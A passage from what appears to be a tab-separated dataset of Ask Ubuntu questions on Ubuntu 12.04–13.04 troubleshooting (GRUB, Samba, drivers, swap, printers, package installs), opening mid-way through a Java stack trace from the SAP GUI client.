1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at com.sap.platin.micro.event.guieventqueue.dispatchevent ( guieventqueue.java:79 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) caused by : java.lang.nullpointerexception at com.sap.platin.base.util.guibitmapmgr. < clinit > ( guibitmapmgr.java:42 ) ... 24 more java.lang.noclassdeffounderror : could not initialize class com.sap.platin.base.util.guibitmapmgr at com.sap.platin.base.plaf.frog.hueshift.platinsystemhueshift.initthemespecificdef ( platinsystemhueshift.java:81 ) at com.sap.platin.r3.plaf.frog.frogsapconfigurator.initdefaults ( frogsapconfigurator.java:45 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at com.sap.platin.base.plaf.designlookandfeel.getdefaults ( designlookandfeel.java:350 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:536 ) at com.sap.platin.base.logon.guiimpl $ 1.run ( guiimpl.java:104 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at com.sap.platin.micro.event.guieventqueue.dispatchevent ( guieventqueue.java:79 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) java.lang.noclassdeffounderror : could not initialize class com.sap.platin.base.util.guibitmapmgr at com.sap.platin.wdp.plaf.ur.wdpurconfigurator.initurcomponentdefaults ( wdpurconfigurator.java:61 ) at com.sap.plaf.ur.urconfigurator.initdefaults ( urconfigurator.java:241 ) at com.sap.platin.wdp.plaf.ur.wdpurconfigurator.initdefaults ( wdpurconfigurator.java:47 ) at com.sap.platin.wdp.plaf.ur.wdpurconfigurator.getdefaults ( wdpurconfigurator.java:42 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl.java:57 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodaccessorimpl.java:43 ) at java.lang.reflect.method.invoke ( method.java:606 ) at com.sap.platin.base.plaf.designlookandfeel.getdefaults ( designlookandfeel.java:400 ) at javax.swing.uimanager.setlookandfeel ( uimanager.java:536 ) at com.sap.platin.base.logon.guiimpl $ 1.run ( guiimpl.java:104 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at com.sap.platin.micro.event.guieventqueue.dispatchevent ( guieventqueue.java:79 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) exception in thread `` awt-eventqueue-0 '' java.lang.noclassdeffounderror : could not initialize class com.sap.platin.base.util.guibitmapmgr at com.sap.platin.base.logon.guilogon.initcomponents ( guilogon.java:1369 ) at com.sap.platin.base.logon.guilogon. < init > ( guilogon.java:291 ) at com.sap.platin.base.logon.guilogon.getlogonframe ( guilogon.java:1344 ) at com.sap.platin.base.logon.guilogonmanager.getlogonframe ( guilogonmanager.java:60 ) at com.sap.platin.base.logon.guilogonmanager.setvisiblelogonframe ( guilogonmanager.java:78 ) at com.sap.platin.base.logon.guiimpl $ 2.run ( guiimpl.java:164 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:733 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:694 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:692 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:703 ) at com.sap.platin.micro.event.guieventqueue.dispatchevent ( guieventqueue.java:79 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 )
312406	how to set environemt variable without rebooting ubuntu ?	problem : during android development , in order to add adb path to environment variable ; i did following things in short- gedit /etc/environment - added my desired path in the file such as : /media/software/00.androidlinux/adt/sdk/platform-tools but , what i noticed that , adding path to the file has no effect to $ path until i reboot my ubuntu . my question is , how can i add path to /etc/environment variable , and without restarting ubuntu ? , so that i can work with my modified $ path . please note : i 'm new to ubuntu and learning each day .
312408	upload file from my virtual machine to another virtual machine using hadoop hdfs	can any one please tell me , how can i upload a txt file from my local machine to another virtual machine based on ip address in hdfs . regards , lokesh g
312409	how can i change icon size in empathy in 13.04 ?	i upgraded from 12.04 to 13.04 , and after i realized that the icon size ( or theme ) of contact list of empathy can not be changed . is it true ? or could i not find the setting ? the huge icons are very pesky for me because i have a lot of contacts .
312411	is removing memtest entries from grub a bad idea ?	the memtest entries in grub are just annoying and useless imo ( i think they should n't even come preinstalled , they only confuse newbies and if you really need them you can install them later ... ) . is it a bad idea to remove them ?
312414	grub is unable to detect windows	i installed ubuntu and windows 7 in uefi mode , but grub is unable to detect windows . i ran boot repair , and here are the contents of the boot info file
312417	shell script to block ip addresses	is it possible to write a shell script that checks connections in an apache server and blocks suspicious ip addresses with large number of connections automatically and fires a mail for it to the system administrator . please help . i have also heard about fail2ban . will it be convenient to use fail2ban or a shell script as shell script need to be run on regular time intervals . any comments ?
312419	htop showing duplicate applications with very odd bizarre results upwards of 20,30,40 or more , see screen grab	i have attached screen shots of htop and it 's bizarre results . can anyone explain what is happening here ? it shows this new copy.com app taking up like 500 % of my memory if you count it up .
312424	how to install nautilus-terminal in ubuntu 13.04	i recently upgraded to raring 13.04 and am having trouble installing nautilus-terminal http : //projects.flogisoft.com/nautilus-terminal/ i rely very heavily on the project and how feel handicapped without the little terminal above my nautilus . i have installed the application successfully but i think the new version of nautilus does not support this plugin . please correct me if im wrong . any help is appreciated . thanks .
312426	data recovery in ubuntu12.10	i 've been using ubuntu 12.10 untill i decided to upgrade to the 13.04 version , but while upgrading internet connection was lost and i restarted the system , now when i login it allows me to enter my password and all , but it gives a black screen instead , which i think , is natural since the system was not fully upgraded ... ... my question is , how can i recover that data i had before this operation ? thanks in advance for your answers !
312428	how can i make a list with most used commands in terminal ?	how can i make a list with most used commands in terminal ? i know that this question may be unuseful for any future proposals for some of us , but even like this , the list can be useful when we do n't remember a command used once or some times in the past , when we can search at the end of this list .
312431	ca n't find mediatomb or minidlna to install on ubuntu-server	installed ubuntu-server 12.04lts ( 64bit ) but can not install mediatomb and minidlna . the reason is that `` apt-get mediatomb install '' can not find it . the same when i try it for minidlna . how can i solve this problem ?
312433	friends-app crashes on start	whenever i try and start friends-app , it crashes with the error : friends-dispatcher crashed with valueerror in raw_decode ( ) : no json object could be decoded i 've tried reinstalling but that did n't help . it works fine on another pc ( logging in to the same twitter account ) , also on 13.04 . the apport error lists the crash as a duplicate of https : //bugs.launchpad.net/bugs/1166432 , but that just 404s , so i do n't know what the underlying issue is . how do i fix the problem ? edit : launching from a terminal gives me : virtual void onlineaccounts : :plugin : :registertypes ( const char* ) ubuntu.onlineaccounts virtual void friendsplugin : :registertypes ( const char* ) friends qqmlcomponent : component is not ready model : `` com.canonical.friends.streams '' account-service-model.cpp 266 update account-service-model.cpp 266 update segmentation fault ( core dumped )
312438	ubuntu-gnome 13.04 - lock screen takes lot of time to unlock	i have gnome-screensaver package installed for using ctrl+alt+l to lock the screen . though locking the screen works fine , it takes a whole lot of time to unlock after entering my password at the prompt . the lock screen just freezes during the time ( mouse is active ) . here are the log messages from $ home/.cache/gdm/session.log when screen is locked : ( gnome-shell:2850 ) : glib-gio-warning ** : dropping signal activesessionchanged of type ( s ) since the type from the expected interface is ( o ) ( above message repeated 5 times ) js error : ! ! ! exception was : typeerror : arguments [ 0 ] is null js error : ! ! ! message = ' '' arguments [ 0 ] is null '' ' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/ui/components/autorunmanager.js '' ' js error : ! ! ! linenumber = '133' js error : ! ! ! stack = ' '' ( null , [ object _private_gio_ioerrorenum ] ) @ /usr/share/gnome-shell/js/ui/components/autorunmanager.js:133 ( [ object _private_gio_dbusproxy ] , [ object _private_gio_simpleasyncresult ] ) @ /usr/share/gjs-1.0/overrides/gio.js:86 '' ' when screen is unlocked : ( gnome-shell:2850 ) : glib-gio-warning ** : dropping signal activesessionchanged of type ( s ) since the type from the expected interface is ( o ) ( above message repeated 4 times ) js log : loading default theme ( adwaita ) ( gnome-shell:2850 ) : glib-gio-warning ** : dropping signal activesessionchanged of type ( s ) since the type from the expected interface is ( o ) ( above message repeated 13 times ) js error : ! ! ! exception was : typeerror : arguments [ 0 ] is null js error : ! ! ! message = ' '' arguments [ 0 ] is null '' ' js error : ! ! ! filename = ' '' /usr/share/gnome-shell/js/ui/components/autorunmanager.js '' ' js error : ! ! ! linenumber = '133' js error : ! ! ! stack = ' '' ( null , [ object _private_gio_ioerrorenum ] ) @ /usr/share/gnome-shell/js/ui/components/autorunmanager.js:133 ( [ object _private_gio_dbusproxy ] , [ object _private_gio_simpleasyncresult ] ) @ /usr/share/gjs-1.0/overrides/gio.js:86 '' ' ( above block repeated 4 times ) are these related to the long delay/freeze in unlocking the screen ? or is it caused by some other software etc . glad to provide any extra information in this regard . thanks .
312442	vmware workstation 9	guys im having problem with changing the license key of vmware workstation 9 on ubuntu . the terminal commands i found doesnt work neither which gives me the error saying that no such location found . i use ubuntu 13.04 so where did vmware installed and how can i change it ? thanks !
312443	should i use desktop or server version for my own java+mysql trading system ?	i am going to build a trading system with java and mysql but i am not sure should i use desktop or server version . the backtest part would involve a lot of calculation and live trade part requests stability and quick response timing .
312444	how to make the command line history apply across all terminals	i always have at least 3 terminator ( a terminal program ) windows open , but sometimes open another terminal to just do something quickly . how can i make it so the command history is common throughout all of them ?
312451	visually recognise active window	ubuntu 13.04 i work with two monitors , usually with lots of different windows open . i do n't like to use the mouse , so swap between applications using alt-tab usually . the problem comes when i want to type something into an application . i need the active application to immediately obvious , usually so that i can tell which monitor to look at next . with default ubuntu ( with appearance = ambiance ) , the only real visual indication of a window being active is that the header bar of the application is in a lighter font color . this is too subtle for me , so i find myself alt-tabbing and moving my mouse too much when switching applications , then clicking around with the mouse to give a particular window the focus . i want my switching to be more accurate , and for that i think i need better feedback on what window has the focus . this needs to be more obvious than it is now . i looked at the high contrast appearance , and it helps somewhat , but the inconsistency in the icon sets is far too distracting . i think what i need is a something like a bright border right around the window , or something like that , to make the active window really stand out . or , maybe to have the non-active windows fade to the background a bit . i would appreciate tips on how others overcome this problem , to make the active window stand out visually from the other windows . thank you !
312456	ca n't access samba shares on ubuntu-server from other computers	installed ubuntu-server 12.04 and configured /etc/samba/smb.conf as : # ======================= global settings ======================= [ global ] workgroup = hemma server string = % h server ( samba , ubuntu ) security = user wins support = yes dns proxy = no log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d encrypt passwords = no passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user # # # # # # # # # # # # misc # # # # # # # # # # # # usershare allow guests = yes # ======================= share definitions ======================= [ printers ] comment = all printers browseable = no path = /var/spool/samba printable = yes guest ok = no read only = yes create mask = 0700 # windows clients look for this share name as a source of downloadable # printer drivers [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes read only = yes guest ok = no [ bilder original ] comment = original bilder path = /mnt/bilder/org browseable = yes read only = no guest ok = no create mask = 0755 [ bilder publika ] comment = bilder făśr allmă¤n visning path = /mnt/bilder/public browseable = yes read only = yes guest ok = yes [ musik ] comment = musik path = /mnt/music/public browseable = yes read only = yes guest ok = yes i have a network setup around a 4g router `` huawei b593 '' where some computers are connected by wifi and others by lan . the server is connected by lan . on one computer running windows xp i can see the server but are not allowed to acces them . on another computer on the wifi-net running win7 i can not see the server at all but i can ping the server and i can see the smb-protocoll is running when sniffing with wireshark . i do n't primarily want to use passwords , computers on the lan and wifi should be able to connect without any login-procedure . i 'm sure my config is not sufficient but have hard to understand how i should do . theres a lot of descriptions on the net but most is old and none have been of any help . i 'm also confused by the fact that i can not se the sever on my win7-machine even though it communicates with the samba-server . would be very happy if anyone could spread some light over this mess .
312459	how do i import contacts from csv file into ubuntu contacts	my contacts are currently on my computer on csv format . is there any way to transfer them to ubuntu contacts ?
312461	vodafone ubuntu webbook : keyboard and mouse-pad not working	the keyboard and trackpad of my vodafone ubuntu webbook are not responding , only the power button works . i want to know if this is a software or hardware problem , if it 's the former how can i get it fixed .
312466	problem with setting up xrdp on lubuntu 13.04	after fresh install of lubuntu 13.04 i did sudo apt-get install tightvncserver sudo apt-get install xrdp now when i login with remote desktop client from windows or ubuntu , i get black and white mesh screen . i followed various help forums like http : //sourceforge.net/p/xrdp/discussion/389417/thread/64949bc2 , but nothing worked !
312467	how to install `` pps media for ubuntu '' ?	i am a ubuntu newbie from hong kong . i want to install `` pps media for linux ubuntu '' into my computer . firstly , i downloaded a package from http : //dl.pps.tv/pps_linux_download.html . however , when i clicked it to install , the app center showed me a error . how can i deal with this problem ?
312468	is ubuntu 12.04 a plug and play os in bios ?	in windows since lots of years back one should always enable plug and play os in the bios . in gnu/linux you should disable this option back in the old days . how is it nowadays , using ubuntu 12.04 64-bit for example ?
312472	how to fix slow-performing machine ?	my laptop is a compaq nx6110 with 1 gb ram . before ubuntu , xp was originally installed on it and was not too slow . but after i installed ubuntu 13.04 ( replacing xp ) it is too slow . even youtube videos are not played continuously though the net speed is sufficient . also the headset is not detected . what can i do to fix this ?
312480	how to see installed programs and the occupied space ( not in synaptic or terminal ) ?	i am often running low on space on the system and home partition . i would like to see a list of installed programs and the space they take , in order to be able to make decisions on this matter . i do not mean a list with all components , 'secondary ' programs and dependencies like in synaptic , which i know can be also displayed in the terminal -- so please do not set as duplicate of this question -- , but just a list with the main programs ( those that appear in the main menu ) and with the space they occupy on the disk . ( i use xubuntu 12.10 )
312485	remove the `` login part '' in the startup stage [ unlocking the disk ]	i want to remove the `` login part '' in the startup stage . it is too disturbing . it 's showed that `` unlocking the disk/dev/disk/by-uuid/2e97702d-a4db-4d1b-8b0c-d3714dbde728 ( sdas_crypt ) enter pass pharase '' maybe my problem is come from `` for more security : tick '' on the intallation process of ubuntu . i do n't want to reinstall ubuntu . how can i deal with that ?
312492	installing nvidia drivers on 13.04 and removing loading choice screen on startup	i am brand new to ubuntu , after many years with windows and a dabble with osx , so please go easy on me . yesterday , after ruining the pre-installed windows 8 with the ubuntu install i had to install my copy of windows 7 , in which i could n't get any wifi , so i then erased windows 7 with ubuntu 13.04 ... . i have a couple of questions please . when i turn on my laptop , i get the purple screen which lists choices of ubuntu , and windows 7 loader , even though ubuntu erased this on install , and a couple of other choices ... how do i completely get rid of that screen , so my laptop boots straight to ubuntu , without me having to make a choice ? on my laptop i have nvidia graphics card 675m . i tried to install nvidia drivers via the software updater , in 'additional drivers ' , i chose the latest one '313 ' and '310 ' , both changed the resolution in ubuntu and make the laptop flash with a crackly black screen on shutdown and startup . when i installed the drivers i also could not find any nvidia control panel . so how do i safely install nvidia drivers ? i know there is a long winded install using a virtual console , which i have never used in my life . do i have to download the drivers from nvidia first from their website before doing anything ? thanks in advance , d .
312498	ubuntu 13.04 does not show any icons when i login to ubuntu	when i login , i just see backgroundimage and mousecursor but no icons . i have reinstalled ubuntu but still at the same point . what can i do
312500	installing ubuntu on an old pc running windows 8 consumer preview	i have an old pc running windows 8 consumer preview . the pc initially had windows vista . i downloaded the 32 bit version of ubuntu 12.04 lts and made a bootable pendrive . in the ubuntu installation options , i clicked the install into a hard drive but after a while it shows me a black screen with a cursor and i ca n't get any further . what should i do ? should i try the 64 bit version ?
312506	boot & log on slow + graphics test fails on ubuntu 13.04	i would really appreciate your feedback here . i have installed 13.04 on a friends laptop - with disappointing results : the boot is slow , the log-on is slow , and launching applications is slow . once things are up and running , they run ok . however , if i run the graphics test using the system tester application , it fails . it is a new high the acer laptop with intel graphics . obviously it looks like a problem with the graphics card , but i think i already have the latest intel drivers . all details below . thanks in advance ! laptop details acer aspirev3-571 ubuntu 13.04 kernal 3.9.0-030900rc8-generic the sticker on the laptop says its a intel hd4000 graphics chip '' details '' shows this : processor : intel core i5-3230m cpu @ 2.60ghz graphics : intel ivybridge mobile x86/mmx/sse2 o/s type : 32 bit '' additional drivers '' in `` software & updates '' shows : '' no proprietary drivers are in use '' lspci shows : - vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) the graphics test fails . the output shows this : opengl vendor string : intel open source technology center opengl renderer string : mesa dri intel ( r ) ivybridge mobile x86/mmx/sse2 opengl version string : 3.0 mesa 9.1.3 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes compiz supported : yes -- -- -- -- -- -- video driver information -- -- -- -- -- -- - video driver : intel driver version : 2.21.6 -- -- -- -- -- -- - hybrid graphics check -- -- -- -- -- -- -- -- graphics chipset : intel ( 8086:0166 ) loaded ddx drivers : intel , vesa , modesetting , fbdev hybrid graphics : no i tried to install the `` intel graphics installer '' but it shows : '' w : failed to fetch http : //ppa.launchpad.net/nikount/orta-desktop/ubuntu/dists/raring/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . '' help !
312507	error while executing standard ubuntu touch program	i 've followed the instructions for the standard app and it was all working ok . i had some issues with componentsshowcase.qml , because of which i messed up the app . so , i removed the ppas and added them again , added qt creator again and now when i run the file using ctrl+r , it does n't execute . i get this error for importpaths : [ `` . '' , '' /usr/bin '' , '' /usr/lib/i386-linux-gnu/qt5/qml '' ] > starting /opt/qt5/bin/qmlscene -i /home/dorsatum/damn -i /usr/bin -i /usr/lib/i386-linux-gnu/qt5/qml /home/dorsatum/damn/damn.qml got bus address : `` unix : abstract=/tmp/dbus-ck25kbmebc , guid=d8a8b322cec2081693b79ed000003bc2 '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-ck25kbmebc , guid=d8a8b322cec2081693b79ed000003bc2 '' registered dec : true qmetatype : :registertype : binary compatibility break -- type flags for type 'qpaintbuffercacheentry ' [ 1024 ] do n't match . previously registered typeflags ( 0x3 ) , now registering typeflags ( 0x103 ) . the program has unexpectedly finished . /opt/qt5/bin/qmlscene exited with code 0 and this for importpaths : [ `` /opt/qt5/imports '' ] > starting /opt/qt5/bin/qmlscene -i /opt/qt5/imports /home/dorsatum/qt/curr/curr.qml got bus address : `` unix : abstract=/tmp/dbus-ck25kbmebc , guid=d8a8b322cec2081693b79ed000003bc2 '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-ck25kbmebc , guid=d8a8b322cec2081693b79ed000003bc2 '' registered dec : true file : ///home/dorsatum/qt/curr/curr.qml:11:1 : mainview is not a type mainview { ^ how can this be solved ?
312509	how do i get my compiler to locate the x11 header files ?	i 'm trying to use glew and xserver / x11 in a c++ app as instructed in chapter 15 of the opengl superbible , 5th ed . i 'm using this makefile : libdirs = -l/usr/x11r6/lib -l/usr/x11r6/lib64 -l/usr/local/lib incdirs = -i/usr/include -l/usr/include cc = g++ cflags = $ ( compilerflags ) -g $ ( incdirs ) libs = -lx11 -lxi -lxmu -lm -lglew -lglu -lgl glxbasics : glxbasics.o $ ( cc ) $ ( cflags ) -o glxbasics $ ( libdirs ) glxbasics.cpp $ ( libs ) clean : rm -f *.o and getting this result : glxbasics.cpp:4:18 : fatal error : glew.h : no such file or directory [ edit : ] after fixing a silly coding error , i now have trouble with x11 , and my glew issues are history . /usr/bin/ld : can not find -lxi /usr/bin/ld : can not find -lxmu [ /edit ] if i comment out the inclusion of glew.h , it fails on the inclusion of glxew.h . i have sudo-copied and pasted glew.h and glxew.h to /usr/include/gl . ( which is where i believe they 're supposed to be ? ) forgive me in case i forgot to include something in my question - anything you 'd like to know or see from my terminal just ask .
312516	way to call through dongle in ubuntu 13.04	i am living in sri lanka and cheapest way for access internet is through pre-paid mobile broadband here . in order to recharge pre-paid account we need to remove the sim card from from the dongle and connect to a phone . after recharge then again need to connect the sim to the dongle . to avoid this difficulties it is better if we can dial through the dongle for recharge with a software . in some other os , we can do this with mobile partner software . but in ubuntu , the version supported is unable to make calls/ dial . if someone can help to find a solution , it would be a great help .
312517	how to re-encrypt my swap to activate it again ?	a while back i was messing with my swap space , turning it on and off using sudo swapon -a and sudo swapoff -a . since i generally have enough ram anyway ( 6gb ) i totally forgot about it . currently i am running some quite hefty and memory-hungry analyses which are bringing me to the borders of my 6gb . i suddenly saw that my memory was still turned off , so i wanted to turn it on using sudo swapon -aagain . unfortunately , that gave me an error : swapon : /dev/mapper/cryptswap1 : stat ( ) has failed : file or folder does not exist . i had a look at my fstab , which looks like this : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=f2ef1c1b-f606-44ed-9405-979fb6fa8ca4 / ext4 errors=remount-ro 0 1 # /home was on /dev/sda3 during installation uuid=7a1f29ef-3fcd-40ce-8e2a-4b9181a46863 /home ext4 defaults 0 2 # swap was on /dev/sda2 during installation # uuid=d0ef2314-6a84-432d-94f8-0d46c91c3d99 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 whenever i see any option to encrypt something , i always do , not only because i do n't like having people snooping around my files , but also for the high-tech james bond-feel of it.. : ) . supposedly i now need to re-encrypt my swap in order for it to be usable again . i would n't have a clue of how to do that though . so my questions are : is the solution to my problem indeed the re-encryption of my swap-partition ? and if so ; how do i re-encrypt my swap partition ? all tips are welcome !
312519	installed 12.04 / windows xp will no longer boot	installed 12.04 , can no longer boot xp . it is available as a bootable os in grub , as soon as it is selected it returns to the grub selection screen . boot-repair did not work . i 'm a noob , so i probably jacked something up . i can still access all my docs , but i have some job specific programs that i need xp to run . here is the boot-repair report http : //paste.ubuntu.com/5798318/ update*** after reading several related threads ( before and after this post ) , i have already tried creating an xp boot cd , which does not boot . i get taken to a blue grub screen with the grub > prompt . it appears that my mbr is corrupt or that the boot loader for vista/xp has been moved to a different partition/overwritten by ubuntu ? the only options that i can think of are to completely remove ubuntu and xp and start from scratch . however , i do not want to do that unless my machine has a corrected mbr and will load installation media from the bios boot preferences ( making sure it 's looking the correct place ) .
312520	how to recover the default php.ini	i accidentally deleted php.ini from /etc/php5/apache2 . how to recover it ? i tried to remove and install php5 without luck .
312522	is a nook reader app for ubuntu touch being developed ?	i have a library of nook books and would like to read magazines on an ubuntu touch nexus 7 . does anyone know whether a nook app is on the cards ?
312523	way to resolve problem with gadmei tv tuner	i am having a gadmei utv382e usb tv tuner . in sri lanka . mostly used tv tuner is gadmei . other brands are rarely found . in this tv tuner chip , there is n't a driver for linux . can it be driven from a other application ? is there any method to overcome this problem ? here is lsusb output : dumindumahawela @ dumindumahawela : ~ $ lsusb bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 10f1:1a34 importek bus 002 device 004 : id 1f71:3306 bus 002 device 003 : id 12d1:1001 huawei technologies co. , ltd. e169/e620/e800 hsdpa modem the device with no name is that tv tuner .
312529	what 's happen ? suddenly no sound + youtube 's videos are played too fast in 13.04	what has happened ? suddenly i have no sound and youtube 's videos are played too fast . is there a flash problem ?
312535	developing : where to start ?	i 'm interested in getting into the technicalities of the os , perhaps by doing some developing but mainly just understanding how everything works on ubuntu ! i 've been using it for about 6 months and i absolutely love it and the whole community , i know some basic python and javascript ( i 've been taking the codecademy courses ) but i really do n't know where to start . any ideas will be welcomed ( books , websites or even just something that i should look into ) . thanks in advance ! jo
312536	ubuntu / install nodejs & npm	i 'm trying to install nodejs and npm , however , it fails . this is my terminal : sudo apt-get install nodejs npm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : nodejs : conflicts : npm e : unable to correct problems , you have held broken packages . what to do ? i 'm kinda lost : (
312537	guake does not show end of text line	working on ubuntu 12.04 , guake 0.4.3 . faced with inappropriate behavior with end of text lines ( left side of screen ) that are displayed on guake . see screenshot : also i navigate to /etc to find any settings to configure : alexander @ alexander-u36sd : /etc $ sudo grep -rl `` guake '' ./ ./xdg/autostart/guake.desktop alexander @ alexander-u36sd : /etc $ cat ./xdg/autostart/guake.desktop [ desktop entry ] name=guake terminal name [ pt ] =guake terminal name [ pt_br ] =guake terminal comment=use the command line in a quake-like terminal comment [ pt ] =utilizar a linha de comando em um terminal estilo quake comment [ pt_br ] =utilizar a linha de comando em um terminal estilo quake tryexec=guake exec=guake icon=/usr/share/pixmaps/guake/guake.png type=application categories=gnome ; gtk ; utility ; terminalemulator ; startupnotify=true x-gnome-autostart-enabled=false but , not sure is it right place to configure ? thanks .
312538	printer on cups installed , but wo n't print	this issue really annoys me . i got a new printer and want to make a network printer through my home server running ubuntu server . cups installation went fine , i connected the printer to the server by usb and added it to cups via web interface . the printer got recognized ( there was usb : radiobutton ) , but then i was supposed to specify the printer model - mine was n't listed there . so i chose a different , yet similar model ( mine is canon lbp7100 , so i tried the lbp family models ) . but when i try to print something , it sits in the queue for a while , then the task vanishes and that 's about it . no error , no printing , no nothing . i then tried to connect it directly to my kubuntu laptop . the weird thing is , the printer does n't get detected at all . not only in the gui printer manager , but not even x-wise ( i ran tail -f /var/log/xorg.0.log ) - all usb devices do something ( even if they 're not recognized ) , but the printer does n't cause anything at all . so , there are two questions , really : how do i set up a printer with no drivers ( there are ones for windows ) , and secondly , what 's the deal with the printer not appearing in x log at all ? i 'd expect regular gui system to notify me of connected devices : /
312552	error installing sha	i 'm trying to install sha using the following command perl -mcpan -e 'install digest : :sha' i also tried using : sudo cpan 'install digest : :sha' but i 'm getting a linker error : /usr/local/bin/ld : this linker was not configured to use sysroots collect2 : error : ld returned 1 exit status make : *** [ blib/arch/auto/digest/sha/sha.so ] error 1 mshelor/digest-sha-5.84.tar.gz /usr/bin/make -- not ok running make test ca n't test without successful make running make install make had returned bad status , install seems impossible could someone please help me fix the error . my ubuntu version is 12.04
312553	newbie - trouble with install freezing	i recently booted up an old pc tower of mine ( like from 2003 ) because i wanted a pc to use for writing . it has xp on it , but it is stuffed to the gills with old programs and files , so much so that i thought it would be easiest to just start clean with ubuntu . i followed the directions for a bootable usb , and was able to get to the installation stage , but it always freezes when it comes to the screen that asks if i want to install over xp . the only thing i can do is cancel it , and then it says there was an unrecoverable internal error . i thought perhaps xp was just being a booger and tried to wipe it from the hard drive , but ( newbie ) i was having trouble with that using the command prompt . i guess my question is what should i do ? could my pc just be too old ? is the problem that i do n't have internet connected when i 'm trying to install ? is it xp ? any suggestions would really help , because i 'm stumped ! thanks ! edit : trying to install 12.04
